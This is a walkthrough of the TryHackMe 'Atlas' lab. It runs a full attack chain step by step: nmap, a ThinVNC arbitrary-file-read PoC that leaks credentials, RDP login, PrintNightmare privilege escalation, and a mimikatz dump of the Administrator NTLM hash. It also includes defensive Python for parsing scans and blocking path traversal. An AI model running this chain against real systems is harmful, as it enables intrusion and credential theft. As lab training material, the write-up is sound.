Overview
This is a walkthrough of the TryHackMe room "Atlas".
Task2
Q2.With the Nmap default port range, you should find that two ports are open. What port numbers are these?
Run a port scan.
$ nmap -Pn -sC -sV -A -T4 -p- -oN nmap_result 10.10.181.229
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=GAIA
| Not valid before: 2024-09-01T06:15:19
|_Not valid after: 2025-03-03T06:15:19
|_ssl-date: 2024-09-02T06:25:24+00:00; +1s from scanner time.
8080/tcp open http-proxy
| http-auth:
| HTTP/1.1 401 Access Denied\x0D
|_ Digest opaque=KYdP1HGtOWMCu6RrB58jvIG2JhNVowLF60 realm=ThinVNC qop=auth nonce=Cvi/jyg85kAI6T4CKDzmQA==
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Content-Type: text/html
| Content-Length: 177
| Connection: Keep-Alive
| <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
| GetRequest:
| HTTP/1.1 401 Access Denied
| Content-Type: text/html
| Content-Length: 144
| Connection: Keep-Alive
| WWW-Authenticate: Digest realm="ThinVNC", qop="auth", nonce="dBuYhSg85kBo1z4CKDzmQA==", opaque="vjSgTX4bWLUhEjLFwpojrHxa91o4aiby96"
|_ <HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL requires authorization.<P></BODY></HTML>
|_http-title: 401 Access Denied
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=9/2%Time=66D559E4%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,179,"HTTP/1\.1\x20401\x20Access\x20Denied\r\nContent-Type:\x
SF:20text/html\r\nContent-Length:\x20144\r\nConnection:\x20Keep-Alive\r\nW
SF:WW-Authenticate:\x20Digest\x20realm=\"ThinVNC\",\x20qop=\"auth\",\x20no
SF:nce=\"dBuYhSg85kBo1z4CKDzmQA==\",\x20opaque=\"vjSgTX4bWLUhEjLFwpojrHxa9
SF:1o4aiby96\"\r\n\r\n<HTML><HEAD><TITLE>401\x20Access\x20Denied</TITLE></
SF:HEAD><BODY><H1>401\x20Access\x20Denied</H1>The\x20requested\x20URL\x20\
SF:x20requires\x20authorization\.<P></BODY></HTML>\r\n")%r(FourOhFourReque
SF:st,111,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Type:\x20text/html\
SF:r\nContent-Length:\x20177\r\nConnection:\x20Keep-Alive\r\n\r\n<HTML><HE
SF:AD><TITLE>404\x20Not\x20Found</TITLE></HEAD><BODY><H1>404\x20Not\x20Fou
SF:nd</H1>The\x20requested\x20URL\x20nice%20ports%2C/Tri%6Eity\.txt%2ebak\
SF:x20was\x20not\x20found\x20on\x20this\x20server\.<P></BODY></HTML>\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
This shows which ports are open and what is listening on them.
Port | Service | Version |
---|---|---|
3389 | ms-wbt-server | Microsoft Terminal Services |
8080 | http-proxy | |
A.3389,8080
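The port table above is read off the `nmap -oN` output by hand. As an added example (not part of the original walkthrough), the following Python script parses the per-port lines of that output format, skips NSE script output and the service-fingerprint block, and answers both Task 2 questions from the parsed records: the list of open ports and the service Nmap reports on the higher one. The sample text is constructed from the scan above plus one extra filtered port to show what gets skipped.

```python
import re
from typing import List

# Matches the per-port lines of `nmap -oN` output, e.g.
#   "3389/tcp open  ms-wbt-server  Microsoft Terminal Services"
# NSE script lines ("| ssl-cert: ...") and the "SF-Port..." fingerprint
# block start differently and therefore never match.
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open\|filtered|closed\|filtered|open|closed|filtered|unfiltered)\s+"
    r"(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)

# Constructed sample: the two port lines from the scan above, one filtered
# port, and a script-output line, to show what is kept and what is skipped.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE    SERVICE       VERSION
135/tcp  filtered msrpc
3389/tcp open     ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=GAIA
8080/tcp open     http-proxy
|_http-title: 401 Access Denied
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""


def parse_nmap_ports(text: str) -> List[dict]:
    """Return one record per port line, in file order.

    Each record has the keys port (int), proto, state, service and version
    (empty string when Nmap printed no version, as for 8080/tcp above).
    """
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["port"] = int(rec["port"])
        rec["version"] = rec["version"] or ""
        records.append(rec)
    return records


def open_ports(records: List[dict]) -> List[int]:
    """Port numbers in state 'open', ascending (Task 2 Q2)."""
    return sorted(r["port"] for r in records if r["state"] == "open")


def service_on_highest_open_port(records: List[dict]) -> str:
    """Service name Nmap reports on the highest open port (Task 2 Q3)."""
    open_recs = [r for r in records if r["state"] == "open"]
    if not open_recs:
        raise ValueError("no open ports in scan output")
    return max(open_recs, key=lambda r: r["port"])["service"]


def as_markdown_table(records: List[dict]) -> str:
    """Render the open ports in the same table layout used in this walkthrough."""
    rows = ["Port | Service | Version |", "---|---|---|"]
    for r in records:
        if r["state"] == "open":
            rows.append(f"{r['port']} | {r['service']} | {r['version']} |")
    return "\n".join(rows)


if __name__ == "__main__":
    recs = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    print("open ports:", open_ports(recs))
    print("service on highest open port:", service_on_highest_open_port(recs))
    print(as_markdown_table(recs))
```

To use it on a real scan, read the `-oN` file into a string and pass it to `parse_nmap_ports`; the regex only looks at the port lines, so the rest of the file can be left as-is.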
Q3.What service does Nmap think is running on the higher of the two ports?
Hint.You do not need a service scan for this -- just take the answer from the Service field in a regular Nmap scan
From the port scan results, we can see that the http-proxy service is running on port 8080.
A.http-proxy
Task3
Q1.Use searchsploit to find the vulnerability in ThinVNC
From the port scan results, we can see that ThinVNC is in use on port 8080 (the Digest realm in the 401 response is "ThinVNC").
8080/tcp open http-proxy
| http-auth:
| HTTP/1.1 401 Access Denied\x0D
|_ Digest opaque=KYdP1HGtOWMCu6RrB58jvIG2JhNVowLF60 realm=ThinVNC qop=auth nonce=Cvi/jyg85kAI6T4CKDzmQA==
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Content-Type: text/html
| Content-Length: 177
| Connection: Keep-Alive
| <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
| GetRequest:
| HTTP/1.1 401 Access Denied
| Content-Type: text/html
| Content-Length: 144
| Connection: Keep-Alive
| WWW-Authenticate: Digest realm="ThinVNC", qop="auth", nonce="dBuYhSg85kBo1z4CKDzmQA==", opaque="vjSgTX4bWLUhEjLFwpojrHxa91o4aiby96"
|_ <HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL requires authorization.<P></BODY></HTML>
|_http-title: 401 Access Denied
Search for vulnerability information with searchsploit.
$ searchsploit ThinVNC
------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------ ---------------------------------
ThinVNC 1.0b1 - Authentication Bypass | windows/remote/47519.py
------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Task4
Q1.See if you can figure out how to do this in your terminal by yourself, otherwise, the command is given in the hint.
Hint.git clone https://github.com/MuirlandOracle/CVE-2019-17662
Clone the PoC to the local machine.
$ git clone https://github.com/MuirlandOracle/CVE-2019-17662.git
Checking the arguments with --help shows that host and port must be specified.
$ python CVE-2019-17662.py --help
usage: CVE-2019-17662.py [-h] [-f FILE] [-s] [--accessible] host port
CVE-2019-17662 ThinVNC Arbitrary File Read
positional arguments:
host The target IP or domain
port The target port (1-65535)
options:
-h, --help show this help message and exit
-f FILE, --file FILE The file to read (default: ../ThinVnc.ini
-s, --ssl Does the server use SSL?
--accessible Remove banners and make exploit friendly for screen readers
Running the PoC yields a set of credentials.
$ python CVE-2019-17662.py 10.10.104.52 8080
_____ _ _ __ ___ _ ____
|_ _| |__ (_)_ _\ \ / / \ | |/ ___|
| | | '_ \| | '_ \ \ / /| \| | |
| | | | | | | | | \ V / | |\ | |___
|_| |_| |_|_|_| |_|\_/ |_| \_|\____|
@MuirlandOracle
[+] Credentials Found!
Username: Atlas
Password: H0ldUpTheHe@vens
With the obtained credentials we could log in to the ThinVNC web interface on port 8080.
Clicking the Connect button established a remote desktop session.
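The PoC's help text describes CVE-2019-17662 as an arbitrary file read, and its default target `../ThinVnc.ini` suggests the read is a directory traversal from the web root into the configuration file that stores the credentials. As an added example (not ThinVNC's code, and not from the PoC), the following Python function shows the check such a file-serving handler needs: percent-decode the request, treat backslash as a separator (the target is a Windows service), resolve the path against the web root, and refuse anything that resolves outside it. The web root, the request strings and the double-decoding are assumptions made for the demonstration.

```python
import os
import tempfile
from urllib.parse import unquote


class PathTraversalError(ValueError):
    """Raised when a requested path would resolve outside the web root."""


def safe_resolve(web_root: str, request_path: str) -> str:
    """Map an HTTP request path onto the filesystem, or raise PathTraversalError.

    Returns the canonical absolute path only if it lies inside web_root.
    """
    root = os.path.realpath(web_root)

    # Decode percent-encoding before any path logic. Decoding twice is a
    # defensive assumption so that "%252e%252e" cannot sneak past a
    # single-decode check; it means a literal "%2e" file name is unreachable.
    decoded = request_path
    for _ in range(2):
        decoded = unquote(decoded)

    # Reject embedded NULs outright; they can truncate the path in C code.
    if "\x00" in decoded:
        raise PathTraversalError(f"refusing to serve {request_path!r}: NUL byte")

    # ThinVNC runs on Windows, so "..\\" is just as much a traversal as "../".
    decoded = decoded.replace("\\", "/")

    # Strip leading slashes so an absolute request maps under the root
    # instead of replacing it.
    relative = decoded.lstrip("/")

    # realpath() collapses "." and ".." and follows symlinks, so the
    # containment test below sees the real target, not the spelled path.
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        raise PathTraversalError(
            f"refusing to serve {request_path!r}: resolves outside web root"
        )
    return candidate


# Constructed request paths: the PoC's default, its encoded and
# backslash variants, and two benign requests that must still work.
SAMPLE_REQUESTS = [
    "index.html",
    "sub/../index.html",
    "../ThinVnc.ini",
    "%2e%2e/ThinVnc.ini",
    "..\\ThinVnc.ini",
    "%252e%252e/ThinVnc.ini",
]


def demo() -> dict:
    """Run safe_resolve against SAMPLE_REQUESTS in a throwaway web root."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "www")
        os.makedirs(root)
        for req in SAMPLE_REQUESTS:
            try:
                safe_resolve(root, req)
                results[req] = "allowed"
            except PathTraversalError:
                results[req] = "blocked"
    return results


if __name__ == "__main__":
    for req, verdict in demo().items():
        print(f"{verdict:8} {req}")
```

The essential point is that the containment check runs on the canonicalised path, after decoding and separator normalisation; checking the raw request string for the substring `..` would miss the encoded and backslash forms.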
Task5
Q1.With that in mind, use xfreerdp to connect to the target over RDP.
Hint.Use the same credentials you found in the previous task for VNC.
Connect to port 3389 using xfreerdp.
Use the username and password obtained earlier.
$ xfreerdp /v:10.10.104.52 /u:atlas /p:H0ldUpTheHe@vens /cert:ignore +clipboard /dynamic-resolution /drive:share,/tmp
Task6
Q2.Navigate to the /tmp directory of your attacking VM, then clone the repository.
Clone the PoC repository under /tmp on Kali.
┌──(kali㉿kali)-[/tmp]
└─$ git clone https://github.com/calebstewart/CVE-2021-1675.git
Open PowerShell in the RDP session and run the following command (the Kali /tmp directory is shared as \\tsclient\share via the /drive option above).
. \\tsclient\share\CVE-2021-1675\CVE-2021-1675.ps1
Run the PoC.
Invoke-Nightmare
Run the following command to open a terminal with administrator privileges.
Start-Process powershell 'Start-Process cmd -Verb RunAs' -Credential adm1n
Task7
Q1.What is the Administrator account's NTLM password hash?
Prepare mimikatz.exe under /tmp on Kali.
$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe ./
Run mimikatz from the administrator terminal obtained above.
\\tsclient\share\x64\mimikatz.exe
Dump the Administrator account's NTLM hash from the SAM.
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
664 {0;000003e7} 1 D 25207 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;0034e5fe} 1 F 3593491 GAIA\adm1n S-1-5-21-1966530601-3185510712-10604624-1009 (13g,24p) Primary
* Thread Token : {0;000003e7} 1 D 3648179 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::sam
RID : 000001f4 (500)
User : Administrator
Hash NTLM: c16444961f67af7eea7e420b65c8c3eb
A.c16444961f67af7eea7e420b65c8c3eb